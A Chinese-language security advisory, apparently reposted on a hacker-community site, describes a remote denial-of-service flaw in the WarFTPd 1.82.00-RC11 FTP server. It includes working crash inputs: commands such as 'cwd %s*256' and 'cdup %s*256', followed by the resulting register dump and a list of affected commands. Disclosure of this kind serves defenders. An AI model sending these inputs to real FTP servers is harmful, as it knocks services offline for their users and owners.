WarFTPd多个命令处理远程拒绝服务漏洞

作者：hjack 来源：龙翔阁红客基地日期：2007-8-22 14:01:45

受影响系统

Jgaa WarFTPd 1.82.00-RC11

描述

BUGTRAQ ID: 20944

War FTP Daemon是32位Windows平台上的FTP服务器。

WarFTPd在处理多个命令的畸形参数时存在漏洞，远程攻击者可能利用此漏洞对服务器造成拒绝服务。

如果向各种命令发送了包含有两次“%s”字符的超长字符串的话，就会导致WarFTPd拒绝服务。例如，发送以下命令：

$ ftp target
(Banner)
ftp> quote user anonymous
ftp> quote pass bla
ftp> cwd %s*256

或者：

ftp> cdup %s*256

就会导致服务器崩溃：

EAX 00000001
ECX 00000073
EDX 00000002
EBX 0079E890
ESP 0079E7A0
EBP 00A55A8A ASCII
"s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s(...more %s
characters)"
ESI 0079E7DE
EDI 0000000A
EIP 00431540 war-ftpd.00431540

00431540   8A08             MOV CL,BYTE PTR DS:[EAX]

目前已知至少以下命令受这个漏洞影响：

CWD
CDUP
DELE
NLST
LIST
SIZE

建议

厂商补丁：

Jgaa

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://support.jgaa.com/index.php?MenuPage=frontpage

(t003)

上一篇: Rama CMS Lang参数本地文件包含漏洞
下一篇: 系统安全之单机双操作系统杀毒有技巧

版权与免责声明：
本站部分稿件来源于其他媒体，本站转载是为传播更多的信息，此类稿件仅代表作者个人或来源机构观点,并不代表本站观点，版权归作者或来源机构所有，如果您有任何版权方面问题，请联系我们，我们将马上进行整理。

WarFTPd多个命令处理远程拒绝服务漏洞

作者：hjack 来源：龙翔阁红客基地 日期：2007-8-22 14:01:45

上一篇: Rama CMS Lang参数本地文件包含漏洞 下一篇: 系统安全之单机双操作系统杀毒有技巧

作者：hjack 来源：龙翔阁红客基地日期：2007-8-22 14:01:45

上一篇: Rama CMS Lang参数本地文件包含漏洞
下一篇: 系统安全之单机双操作系统杀毒有技巧